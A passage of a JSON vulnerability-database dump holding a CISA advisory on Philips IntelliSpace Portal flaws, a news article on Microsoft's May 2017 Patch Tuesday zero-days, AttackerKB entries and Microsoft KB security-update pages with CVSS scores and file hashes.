([AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N>)).\n\n### [PERMISSIONS, PRIVILEGES, AND ACCESS CONTROLS CWE-264](<https://cwe.mitre.org/data/definitions/264.html>)\n\nThe ISP has multiple permission, privilege and access control vulnerabilities that could allow an attacker to gain unauthorized access and in some cases escalate their level of privilege or execute arbitrary code.\n\n[CVE-2018-5472](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-5472>), [CVE-2018-5468](<https://nvd.nist.gov/vuln/detail/CVE-2018-5468>), [CVE-2017-0199](<https://nvd.nist.gov/vuln/detail/CVE-2017-0199>), and [CVE-2005-1794](<https://nvd.nist.gov/vuln/detail/CVE-20005-1794>) have been assigned to this vulnerability. The CVSS v3 base scores for theses vulnerabilities range from 6.4 to 7.8\n\n### [UNQUOTED SEARCH PATH OR ELEMENT CWE-428](<https://cwe.mitre.org/data/definitions/428.html>)\n\nAn unquoted search path or element vulnerability has been identified, which may allow an authorized local user to execute arbitrary code and escalate their level of privileges.\n\n[CVE-2018-5470](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-5470>), has been assigned to this vulnerability. A CVSS v3 base score of 7.8 has been calculated; the CVSS vector string is ([AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H>)).\n\n### [LEFTOVER DEBUG CODE CWE-489](<https://cwe.mitre.org/data/definitions/489.html>)\n\nThe ISP has a vulnerability where code debugging methods are enabled, which could allow an attacker to remotely execute arbitrary code during runtime.\n\n[CVE-2018-5454](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-5454>) has been assigned to this vulnerability. A CVSS v3 base score of 5.3 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N>)).\n\n### [CRYPTOGRAPHIC ISSUES CWE-310](<https://cwe.mitre.org/data/definitions/310.html>)\n\nThe ISP has multiple cryptographic vulnerabilities that could allow an attacker to gain unauthorized access to resources and information.\n\n[CVE-2018-5458](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-5458>), [CVE-2018-5462](<https://nvd.nist.gov/vuln/detail/CVE-2018-5462>), [CVE-2018-5464](<https://nvd.nist.gov/vuln/detail/CVE-2018-5464>), [CVE-2018-5466](<https://nvd.nist.gov/vuln/detail/CVE-2018-5466>), [CVE-2011-3389](<https://nvd.nist.gov/vuln/detail/CVE-2011-3389>), [CVE-2004-2761](<https://nvd.nist.gov/vuln/detail/CVE-2004-2761>), [CVE-2014-3566](<https://nvd.nist.gov/vuln/detail/CVE-2014-3566>), and [CVE-2016-2183](<https://nvd.nist.gov/vuln/detail/CVE-2016-2183>) have been assigned to these vulnerabilities. The CVSS v3 base scores for theses vulnerabilities range from 3.1 to 6.5\n\n### VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nSome vulnerabilities could be exploited remotely.\n\n#### EXISTENCE OF EXPLOIT\n\nPublic exploits exist for some of these vulnerabilities; however, none are known to specifically target Philips ISP.\n\n#### DIFFICULTY\n\nAn attacker with a low skill would be able to exploit these vulnerabilities.\n\n## MITIGATION\n\nPhilips will release an updated version of the ISP in the coming months that will address these vulnerabilities. Additionally, Philips\u2019 evaluation of Operating System security patches is ongoing, and after appropriate testing , the patches and mitigating controls are posted on Philips\u2019 InCenter. ISP users are recommended to obtain available mitigating controls by accessing their InCenter account at this location:\n\n<http://incenter.medical.philips.com>\n\nUsers with questions regarding their specific ISP installations are advised by Philips to contact their local Philips service support team or their regional service support.\n\nPhilips\u2019 contact information is available at the following location:\n\n<https://www.usa.philips.com/healthcare/solutions/customer-service-solutions>\n\nPlease see the Philips product security website for the latest security information for Philips products:\n\n<https://www.philips.com/productsecurity>\n\nNCCIC recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate all medical devices and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nNCCIC also provides a section for control systems security recommended practices on the ICS-CERT web page. NCCIC reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nAdditional mitigation guidance and recommended practices are publicly available in the NCCIC Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT website.\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to NCCIC for tracking and correlation against other incidents.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/ICSMA-18-058-02>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-02-27T00:00:00", "type": "ics", "title": "Philips Intellispace Portal ISP Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-2761", "CVE-2005-1794", "CVE-2011-3389", "CVE-2014-3566", "CVE-2016-2183", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0199", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280", "CVE-2018-5454", "CVE-2018-5458", "CVE-2018-5462", "CVE-2018-5464", "CVE-2018-5466", "CVE-2018-5468", "CVE-2018-5470", "CVE-2018-5472", "CVE-2018-5474"], "modified": "2018-02-27T00:00:00", "id": "ICSMA-18-058-02", "href": "https://www.us-cert.gov/ics/advisories/ICSMA-18-058-02", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2018-01-27T09:17:39", "description": "[![Microsoft Issues Patches for Another Four Zero-Day Vulnerabilities](https://1.bp.blogspot.com/-vpXxMS5a1OQ/WRLsUKCC4II/AAAAAAAAsiw/8zkd69jstykdsFIkaYYDa9lAVVLKnZO2QCLcB/s1600/windows-zero-day-exploit.png)](<https://1.bp.blogspot.com/-vpXxMS5a1OQ/WRLsUKCC4II/AAAAAAAAsiw/8zkd69jstykdsFIkaYYDa9lAVVLKnZO2QCLcB/s1600/windows-zero-day-exploit.png>)\n\n \nAs part of this month's Patch Tuesday, Microsoft has released security patches for a total of 55 vulnerabilities across its products, including fixes for four zero-day vulnerabilities being exploited in the wild. \n \nJust yesterday, Microsoft released an [emergency out-of-band update](<https://thehackernews.com/2017/05/windows-defender-rce-flaw.html>) separately to patch a remote execution bug ([CVE-2017-0290](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0290>)) in Microsoft's Antivirus Engine that comes enabled by default on Windows 7, 8.1, RT, 10 and Server 2016 operating systems. \n \nThe vulnerability, reported by Google Project Zero researchers, could allow an attacker to take over your Windows PC with just an email, which you haven't even opened yet. \n \n**_May 2017 Patch Tuesday_ \u2014** Out of 55 vulnerabilities, 17 have been rated as critical and affect the company's main operating systems, along with other products like Office, Edge, Internet Explorer, and the malware protection engine used in most of the Microsoft's anti-malware products. \n \nSysadmins all over the world should prioritize the May's Patch Tuesday as it addresses four critical zero-day vulnerabilities, three of which being actively exploited by cyber-espionage groups in targeted attacks over the past few months. \n \n\n\n### 3 Zero-Days Were Exploited in the Wild by Russian Cyber-Espionage Group\n\n \n**_First Zero-Day Vulnerability ([CVE-2017-0261](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0261>))_ \u2014** It affects the 32- and 64-bit versions of Microsoft Office 2010, 2013 and 2016, and resides in how Office handles Encapsulated PostScript (EPS) image files, leading to remote code execution (RCE) on the system. \n \nThis Office vulnerability could be exploited by tricking victims into opening a file containing a malformed graphics image in an email. The attack also exploits a Windows privilege escalation bug ([CVE-2017-0001](<https://technet.microsoft.com/en-us/library/security/ms17-013.aspx>)) that the company patched on March 14 to gain full control over the system \u2013 essentially allowing attackers to install spyware and other malware. \n \nAccording to the [FireEye](<https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html>) researchers, the CVE-2017-0261 flaw has been exploited since late March by an unknown group of financially motivated hackers and by a Russian cyber espionage group called Turla, also known as Snake or Uroburos. \n \n**Second Zero-Day Vulnerability ([CVE-2017-0262](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0262>)) \u2014 **FireEye and [ESET](<https://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/>) researchers believe that the APT28 hacking group, also known as Fancy Bear, or Pawn Storm, was actively using this EPS-related Microsoft Office zero-day vulnerability which leads to remote code execution on opening a malformed file. \n \n**_Third Zero-Day Vulnerability ([CVE-2017-0263](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0263>))_ \u2014 **The third zero-day bug is an elevation of privilege (EoP) vulnerability in all supported versions of Microsoft's Windows operating system. \n \nThis vulnerability exists in the way Windows kernel-mode driver handles objects in memory, allowing attackers to run arbitrary code in kernel mode and then install malware, view, change, or delete data, and even create new accounts with full user rights. \n \nResearchers believe that the Russian cyber-espionage group was also actively exploiting this flaw (CVE-2017-0263) along with the second zero-day vulnerability (CVE-2017-0262). \n \n**_Fourth Zero-Day Vulnerability ([CVE-2017-0222](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0222>))_ \u2014 **Another zero-day vulnerability affects Internet Explorer 10 and 11 and resides in how Internet Explorer handles objects in memory. \n \nOpening a malicious web page can corrupt memory to trigger remote code execution, allowing attackers to take control of an affected system. According to the tech giant, this issue was also exploited in the wild. \n \n**_Patches for Other Critical Vulnerabilities_ \u2014** This month's security updates also fix critical vulnerabilities in both Edge and Internet Explorer (IE) that could lead to remote code execution by tricking victims into visiting malicious websites or viewing specially crafted advertisements inside the browsers. \n \nBesides this, Microsoft also addresses four critical remote code execution bugs ([CVE-2017-0272](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0272>), [CVE-2017-0277](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0277>), [CVE-2017-0278](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0278>), and [CVE-2017-0279](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0279>)) in Windows SMB network file-sharing protocol, which affects Windows 7 through 10 and Windows Server 2008 through 2016. \n \nThese vulnerabilities put Windows PCs and server installations at risk of hacking if they use SMBv1, though there have been no reports of any of these flaws exploited in the wild. \n \nAs usual, Adobe Flash Players patches are also included in the security update to address [7 CVE-listed flaws](<https://helpx.adobe.com/security/products/flash-player/apsb17-15.html>) in the Windows, macOS, and Linux. \n \nWindows users are strongly advised to install the latest updates as soon as possible in order to protect themselves against the active attacks in the wild.\n", "cvss3": {}, "published": "2017-05-09T23:37:00", "type": "thn", "title": "Microsoft Issues Patches for Another Four Zero-Day Vulnerabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0001", "CVE-2017-0290", "CVE-2017-0272", "CVE-2017-0279", "CVE-2017-0263", "CVE-2017-0278", "CVE-2017-0277", "CVE-2017-0222", "CVE-2017-0262", "CVE-2017-0261"], "modified": "2017-05-10T10:37:40", "id": "THN:35CDED923C2A70050CA53879EA860398", "href": "https://thehackernews.com/2017/05/patch-windows-zero-days.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "attackerkb": [{"lastseen": "2022-07-21T02:03:43", "description": "Windows COM Aggregate Marshaler in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an elevation privilege vulnerability when an attacker runs a specially crafted application, aka \u201cWindows COM Elevation of Privilege Vulnerability\u201d. This CVE ID is unique from CVE-2017-0214.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-12T00:00:00", "type": "attackerkb", "title": "CVE-2017-0213", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0213", "CVE-2017-0214"], "modified": "2021-07-27T00:00:00", "id": "AKB:6D4430B5-2DD4-4277-B666-3F202D23AD1B", "href": "https://attackerkb.com/topics/1PgDqHxZcV/cve-2017-0213", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-27T21:14:17", "description": "The kernel-mode drivers in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allow local users to gain privileges via a crafted application, aka \u201cWin32k Elevation of Privilege Vulnerability.\u201d\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 22, 2020 3:11am UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-12T00:00:00", "type": "attackerkb", "title": "CVE-2017-0263", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0263"], "modified": "2021-07-27T00:00:00", "id": "AKB:FD8F3671-7E1D-4B44-B0A0-D4BBEA6DA814", "href": "https://attackerkb.com/topics/vtnaonG5oN/cve-2017-0263", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2021-01-01T22:39:51", "description": "<html><body><p>Resolves a vulnerability in Windows Embedded POSReady 2009 and Windows Embedded Standard 2009.</p><h2>Summary</h2><div class=\"kb-summary-section section\">An elevation of privilege exists in Windows COM Aggregate Marshaler. An elevation of privilege vulnerability exists when Windows does not validate input correctly before it loads type libraries.<br/><br/>To learn more about the vulnerabilities, see the following Common Vulnerabilities and Exposures (CVE):<ul class=\"sbody-free_list\"><li><a href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-0213\" id=\"kb-link-2\" target=\"_self\">CVE-2017-0213</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-0214\" id=\"kb-link-2\" target=\"_self\">CVE-2017-0214</a></li></ul></div><h2>Fixes that are included in this security update</h2><ul><li>Addresses an issue in which some scanners and serial devices may stop working after security update <a aria-live=\"assertive\" data-bi-name=\"content-anchor-link\" href=\"https://support.microsoft.com/en-us/help/4074852/security-update-for-vulnerabilities-in-windows-wes09-and-posready-2009\" managed-link=\"\" tabindex=\"0\" target=\"_blank\">4074852</a>\u00a0is applied.</li></ul><h2>How to obtain and install the update</h2><div class=\"kb-resolution-section section\"><h3>Method 1: Windows Update</h3><div class=\"kb-collapsible kb-collapsible-expanded\">This update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see <a href=\"https://support.microsoft.com/en-us/help/12373/windows-update-faqx\" id=\"kb-link-13\" target=\"_self\">Windows Update: FAQ</a>.</div><h3 class=\"sbody-h3\">Method 2: Microsoft Update Catalog</h3><div class=\"kb-collapsible kb-collapsible-expanded\">To get the stand-alone package for this update, go to the <a href=\"http://catalog.update.microsoft.com/v7/site/search.aspx?q=4466388\" id=\"kb-link-14\" target=\"_self\">Microsoft Update Catalog</a> website.</div></div><p><strong class=\"sbody-strong\">Important </strong></p><ul class=\"sbody-free_list\"><li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a href=\"https://technet.microsoft.com/en-us/library/hh825699\" id=\"kb-link-5\" target=\"_self\">Add language packs to Windows</a>.</li></ul><h2>More information</h2><h3>Prerequisites</h3><p>There are no prerequisites for installing this update.</p><h3>Restart information</h3><p>You may have to restart the computer after you apply this update.</p><h3>Update replacement information</h3><p>This update doesn't replace a previously released update.</p><h2>More information</h2><div class=\"kb-moreinformation-section section\"><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\"><span class=\"bold btn-link\">How to obtain help and support for this security update</span></td></tr><tr><td faq-panel-body=\"\"><div class=\"kb-collapsible kb-collapsible-collapsed\"><span>Help for installing updates: <a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"https://www.microsoft.com/en-us/safety/pc-security/updates.aspx\" managed-link=\"\" target=\"_blank\">Protect yourself online</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-17\" target=\"_self\">Microsoft Secure</a><br/><br/>Local support according to your country: <a href=\"https://www.microsoft.com/en-us/locale.aspx\" id=\"kb-link-18\" target=\"_self\">International Support</a></span></div><span> </span></td></tr></tbody></table></div><h2>File Information</h2><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\">File hash information</td></tr><tr><td faq-panel-body=\"\"><table class=\"table\"><tbody><tr><th>File name</th><th>SHA1 hash</th><th>SHA256 hash</th></tr><tr><td>WindowsXP-KB4466388-x86-Embedded-ENU.exe</td><td>A55F6E9011156548AB9722DE332F609B17B415D0</td><td>A742F8B84FF530CC7A0205B629C9677352EA85B258DE020224AC6D9E279A8A02</td></tr></tbody></table></td></tr></tbody></table><p><span>The English (United States) version of this software update installs files that have the attributes that are listed in the following tables. The dates and the times for these files are listed in Coordinated Universal Time (UTC). The dates and the times for these files on your local computer are displayed in your local time together with your current daylight saving time (DST) bias. Additionally, the dates and the times may change when you perform certain operations on the files.</span><br/><br/><strong>Windows XP</strong></p><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\">x86 Windows XP</td></tr><tr><td faq-panel-body=\"\"><table class=\"table\"><tbody><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong class=\"sbody-strong\">Platform</strong></td><td><strong class=\"sbody-strong\">SP requirement</strong></td><td><strong class=\"sbody-strong\">Service branch</strong></td></tr><tr><td>Kernel32.dll</td><td>5.1.2600.7593</td><td>993,792</td><td>06-Nov-2018</td><td>22:52</td><td>x86</td><td>SP3</td><td>SP3QFE</td></tr><tr><td>Ntdll.dll</td><td>5.1.2600.7593</td><td>720,384</td><td>06-Nov-2018</td><td>22:52</td><td>x86</td><td>SP3</td><td>SP3QFE</td></tr><tr><td>Ole32.dll</td><td>5.1.2600.7593</td><td>1,299,968</td><td>06-Nov-2018</td><td>06:52</td><td>x86</td><td>SP3</td><td>SP3QFE</td></tr><tr><td>Oleaut32.dll</td><td>5.1.2600.7593</td><td>563,200</td><td>06-Nov-2018</td><td>22:52</td><td>x86</td><td>SP3</td><td>SP3QFE</td></tr><tr><td>Rpcss.dll</td><td>5.1.2600.7593</td><td>404,480</td><td>06-Nov-2018</td><td>22:52</td><td>x86</td><td>SP3</td><td>SP3QFE</td></tr><tr><td>Updspapi.dll</td><td>6.3.13.0</td><td>382,840</td><td>01-Feb-2018</td><td>21:28</td><td>x86</td><td>None</td><td>Not applicable</td></tr></tbody></table></td></tr></tbody></table></body></html>", "edition": 2, "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.0, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-11-13T00:00:00", "type": "mskb", "title": "Description of the security update for the Windows COM elevation of privilege vulnerability in Windows Embedded POSReady 2009 and Windows Embedded Standard 2009: November 13, 2018", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0214", "CVE-2017-0213"], "modified": "2018-11-14T01:06:17", "id": "KB4466388", "href": "https://support.microsoft.com/en-us/help/4466388/", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T13:21:28", "description": "None\n## Summary\n\nAn information disclosure vulnerability exists when the win32k component incorrectly provides kernel information. An attacker who successfully exploits the vulnerability could obtain information to further compromise the user\u2019s system. \n \nTo learn more about the vulnerability, go to [the Security Update Guide](<https://portal.msrc.microsoft.com>).\n\n## More Information\n\nImportant \n\n\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## How to obtain and install the update \n\n### Method 1: Windows Update\n\nThis update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see [Get security updates automatically](<https://www.microsoft.com/en-us/safety/pc-security/updates.aspx>). \n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/search.aspx?q=4019204>) website. \n\n\n## Deployment information\n\nFor deployment details for this security update, go to the following article in the Microsoft Knowledge Base: \n[Security update deployment information: May 9, 2017](<http://support.microsoft.com/en-us/help/20170509>)\n\n## More Information\n\n## \n\n__\n\nHow to obtain help and support for this security update\n\nHelp for installing updates: [Windows Update FAQ](<http://support.microsoft.com/ph/6527>) \n \nSecurity solutions for IT professionals: [TechNet Security Support and Troubleshooting](<https://technet.microsoft.com/security/bb980617.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Microsoft Secure](<http://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>) \n\n\nFile Information\n\n## \n\n__\n\nFile hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nWindows6.0-KB4019204-x64.msu| 6F7B323D9865D8B88CAEB3FC83A8BB74222AFC3F| E44B48BD9F07FA10CC183931D35E89828681A49DF52049AE0D28002337FB87FA \nWindows6.0-KB4019204-ia64.msu| D16A080F7214A81D09FE1781685E84B0E55BBC71| 30D201FE117DFE3924B9E5E4ECBCE2F0E3921E76DD69FFC889DB8F7B78076FC9 \nWindows6.0-KB4019204-x86.msu| 8301605396E05D4B8E2EE38FCB3CD801AD019CCE| 61ED3DBC6DCA600139F6CA77D784B4C8EED77BC6762A1CE209A92642DBE7D23B \n \n \n**File information** \nThe English (United States) version of this software update installs files that have the attributes that are listed in the following tables. \n \n**Windows Server 2008 file information**\n\n**Note: **The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.\n\n## \n\n__\n\nFor all supported x64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nWin32k.sys| 6.0.6002.19778| 2,806,272| 28-Apr-2017| 01:59| x64 \nWin32k.sys| 6.0.6002.24095| 2,808,320| 28-Apr-2017| 02:45| x64 \n \n## \n\n__\n\nFor all supported ia64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nWin32k.sys| 6.0.6002.19778| 6,693,888| 28-Apr-2017| 01:45| IA-64 \nWin32k.sys| 6.0.6002.24095| 6,703,616| 28-Apr-2017| 02:21| IA-64 \n \n## \n\n__\n\nFor all supported x86-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nWin32k.sys| 6.0.6002.19778| 2,074,112| 28-Apr-2017| 03:15| x86 \nWin32k.sys| 6.0.6002.24095| 2,082,304| 28-Apr-2017| 03:51| x86\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-09T07:00:00", "type": "mskb", "title": "Security update for the Windows win32k Information Disclosure Vulnerability in Windows Server 2008: May 9, 2017", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": 